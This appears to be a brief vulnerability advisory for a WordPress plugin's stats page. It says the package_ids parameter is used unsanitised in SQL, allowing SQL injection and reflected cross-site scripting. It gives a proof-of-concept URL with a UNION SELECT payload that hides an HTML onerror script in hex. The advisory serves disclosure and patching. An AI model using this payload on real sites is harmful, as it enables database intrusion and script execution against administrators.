EPSS
Percentile
36.7%
The plugin does not sanitise and escape the package_ids parameter before using it in a SQL statement, leading to a SQL injection, which can also be exploited to cause a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin.php?page=wpdm-stats&package;_ids[0]=0)+UNION+SELECT+1%2C0x3c2f6f7074696f6e3e3c2f73656c6563743e3c696d6720737263206f6e6572726f723d616c6572742831293e+--+p
plugins.trac.wordpress.org/changeset/2656086